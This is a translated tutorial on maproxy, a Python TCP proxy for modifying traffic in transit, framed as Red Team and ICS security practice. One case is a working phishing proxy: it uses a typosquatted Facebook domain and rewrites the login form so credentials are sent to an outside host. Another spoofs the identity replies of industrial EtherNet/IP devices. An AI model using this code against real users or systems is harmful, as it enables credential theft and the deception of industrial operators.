The translation of this article was prepared ahead of the start of the course.
Abstract
Various kinds of security testing, from ordinary penetration tests and Red Team operations to hacking IoT/ICS and SCADA devices, involve working with binary network protocols, that is, intercepting and modifying network data between the client and the target. Sniffing network traffic is not a hard task, since we have tools such as Wireshark, Tcpdump or Scapy, but modification looks like much more work: we would need some kind of interface to read the network data, filter it, change it on the fly and send it on to the target host in near real time. On top of that, it would be nice if such a tool could handle many parallel connections automatically and could be customised with scripts.
One day I came across the tool maproxy, and its documentation quickly made it clear to me that maproxy was exactly what I needed. It is a simple, flexible and easily customisable TCP proxy. I tested this tool on several complex systems, including ICS devices (which generate many packets), to see whether it could cope with many parallel connections, and it performed well.
This article introduces on-the-fly processing of network data with maproxy.
Overview
The maproxy tool is built on Tornado, a popular and mature asynchronous networking framework for Python.
In general it can operate in several modes:
TCP:TCP - unencrypted TCP connections;
TCP:SSL and SSL:TCP - encryption on one side;
SSL:SSL - encryption on both sides.
It ships as a library. To get started quickly, you can use the example files that demonstrate its main features:
all.py
certificate.pem
logging_proxy.py
privatekey.pem
ssl2ssl.py
ssl2tcp.py
tcp2ssl.py
tcp2tcp.py
Case 1 - simple bidirectional proxy
Based on tcp2tcp.py:
#!/usr/bin/env python
import tornado.ioloop
import maproxy.proxyserver
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()
By default ProxyServer() takes two arguments: the target host and the target port. server.listen() takes one argument: the port on which to listen for incoming connections.
Run the script:
# python tcp2tcp.py
To start testing, we connect to the local SSH server through our proxy script, which listens on port 2222/tcp and connects to the SSH server's standard port 22/tcp:
The welcome banner tells us that our example script has successfully proxied the network traffic.
Case 2 - data modification
Another demo script, logging_proxy.py, is well suited to interacting with network data. The comments in the file describe the class methods you can modify to achieve your goal:
The most interesting ones here are:
on_c2p_done_read - intercepts data going from the client to the server;
on_p2s_done_read - the reverse direction.
Let's try to change the SSH banner that the server returns to the client:
[…]
    def on_p2s_done_read(self, data):
        # rewrite the server's SSH version banner before it reaches the client
        # (data is a bytes object, so bytes literals are used for the replacement)
        data = data.replace(b"OpenSSH", b"DumnySSH")
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
# session_factory is what makes the proxy use LoggingSession, as in logging_proxy.py
server = maproxy.proxyserver.ProxyServer("localhost", 22, session_factory=LoggingSessionFactory())
server.listen(2222)
[…]
Run the script:
As you can see, the client is misled, because the name of its SSH server has been changed to «DumnySSH».
Case 3 - a simple web page for phishing sensitive information
There are endless ways to use this tool. In this case, let's focus on something practical from the Red Team operations side. Let's imitate the m.facebook.com landing page and use a custom domain with a deliberate typo, for example m.facebok.com. For the purposes of the demonstration, let's just assume that the domain is registered by us.
We set up an unencrypted network connection from the victims to our proxy and an SSL stream to the Facebook server (31.13.81.36). To make this example work, we need to change the HTTP Host header and inject the correct hostname, and we also disable response compression so that we can easily access the content. Finally, we replace the HTML form so that the login data is sent to us instead of to Facebook's servers:
[…]
    def on_c2p_done_read(self, data):
        # replace Host header
        data = data.replace(b"Host: m.facebok.com", b"Host: m.facebook.com")
        # disable compression
        data = data.replace(b"gzip", b"identity;q=0")
        data = data.replace(b"deflate", b"")
        super(LoggingSession, self).on_c2p_done_read(data)
[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response
        data = data.replace(b'action="/zu/login/"', b'action="https://redteam.pl/"')
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36", 443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]
Finally:
As you can see, we successfully replaced the original site.
Case 4 - proxying Ethernet/IP
I have been working with industrial equipment and software (ICS/SCADA) for a long time: programmable logic controllers (PLC), I/O modules, drives, relays, ladder programming environments and much more. This case is for those who like industrial things. Hacking such solutions involves actively playing with network protocols. In the following example I would like to show how you can modify ICS/SCADA network traffic.
To do this you will need the following:
- a network sniffer, for example Wireshark;
- an Ethernet/IP device or just a SIP device; you can find one using the Shodan service;
- our script based on maproxy.
First, let's look at what a normal identity response from CIP (Common Industrial Protocol) looks like:
Device identification is performed with the Ethernet/IP protocol, an industrial extension of Ethernet that encapsulates control protocols such as CIP. Using our proxy script we will change the highlighted ID name seen in the screenshot, "NI-IndComm for Ethernet". We can again use the logging_proxy.py script and similarly modify the on_p2s_done_read class method, since we want the client to see a different identity name.
The code:
[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response
        # Checking if we got List Identity message response (item type ID 0x000C, little-endian)
        if data[26:28] == b'\x0c\x00':
            print('Got response, replacing')
            # overwrite 10 bytes of the product name at offset 63 with a same-length string
            data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7", 44818, session_factory=LoggingSessionFactory())
server.listen(44818)
[…]
In fact, we requested the device identity twice: the second response is the original one, and the first was modified on the fly.
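The proxy above addresses the reply by fixed byte offsets (26 and 63), so it helps to see where those offsets come from. The following is an added example, not code from the article or from maproxy: it builds a constructed List Identity reply laid out per the EtherNet/IP encapsulation format, parses it with framing checks, and shows that the article's same-length splice keeps the frame consistent while a splice of a different length does not. The product name, serial number and address are made-up sample values.

```python
import struct

# EtherNet/IP encapsulation header (24 bytes) followed by one List Identity item;
# the offsets match the article's proxy: item type at byte 26, product name at byte 63.
ENCAP_HEADER_LEN = 24
CMD_LIST_IDENTITY = 0x0063
ITEM_LIST_IDENTITY = 0x000C
ITEM_FIXED_LEN = 34  # item bytes other than the product name text itself

def build_list_identity_reply(product_name, serial=0x1337):
    """Constructed sample reply (not a capture); address and identity values are made up."""
    name = product_name.encode("ascii")
    item = struct.pack("<H", 1)  # encapsulation protocol version
    item += struct.pack(">hHI8s", 2, 44818, 0x0A000001, b"\x00" * 8)  # sockaddr is big-endian
    # vendor id, device type, product code, revision major/minor, status word, serial
    item += struct.pack("<HHHBBHI", 0x0001, 0x000C, 0x0001, 1, 0, 0x0000, serial)
    item += struct.pack("<B", len(name)) + name  # SHORT_STRING: length byte + text
    item += struct.pack("<B", 0x03)  # device state
    body = struct.pack("<HHH", 1, ITEM_LIST_IDENTITY, len(item)) + item  # item count + item header
    header = struct.pack("<HHII8sI", CMD_LIST_IDENTITY, len(body), 0, 0, b"\x00" * 8, 0)
    return header + body

def parse_list_identity(data):
    """Decode a reply into a dict; raise ValueError when the framing is inconsistent."""
    if len(data) < ENCAP_HEADER_LEN + 6 + ITEM_FIXED_LEN:
        raise ValueError("frame too short for a List Identity reply")
    cmd, length = struct.unpack_from("<HH", data, 0)
    if cmd != CMD_LIST_IDENTITY:
        raise ValueError("not a List Identity reply")
    if length != len(data) - ENCAP_HEADER_LEN:
        raise ValueError("encapsulation length field does not match frame size")
    _count, item_type, item_len = struct.unpack_from("<HHH", data, ENCAP_HEADER_LEN)
    if item_type != ITEM_LIST_IDENTITY:  # the article writes this as data[26:28] == b'\x0c\x00'
        raise ValueError("unexpected item type 0x%04x" % item_type)
    fields = struct.unpack_from("<HHHBBHI", data, 48)
    name_len = data[62]
    if item_len != ITEM_FIXED_LEN + name_len:
        raise ValueError("item length does not match product name length")
    name = data[63:63 + name_len].decode("ascii", "replace")
    return {"vendor": fields[0], "device_type": fields[1], "product_code": fields[2],
            "revision": (fields[3], fields[4]), "status": fields[5], "serial": fields[6],
            "product_name": name, "state": data[63 + name_len]}

def frame_is_consistent(data):
    """True when all length fields agree, e.g. after a same-size splice; False otherwise."""
    try:
        parse_list_identity(data)
        return True
    except ValueError:
        return False
```

Parsing the spliced reply gives the product name "DUMMY31337 for Ethernet", which is why the ten-byte overwrite goes unnoticed by a client that only reads the name; a parser that also checks the length fields catches splices that change the frame size.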
And finally
In my opinion maproxy is a simple and lightweight tool, written in Python, so I believe you too can benefit from using it. Of course, there are more complex tools for processing and modifying network data, but they also require more attention and are usually built for a specific use case. With maproxy, for example, you can quickly implement your ideas for intercepting network data, since the example scripts are very clear.
Source: www.habr.com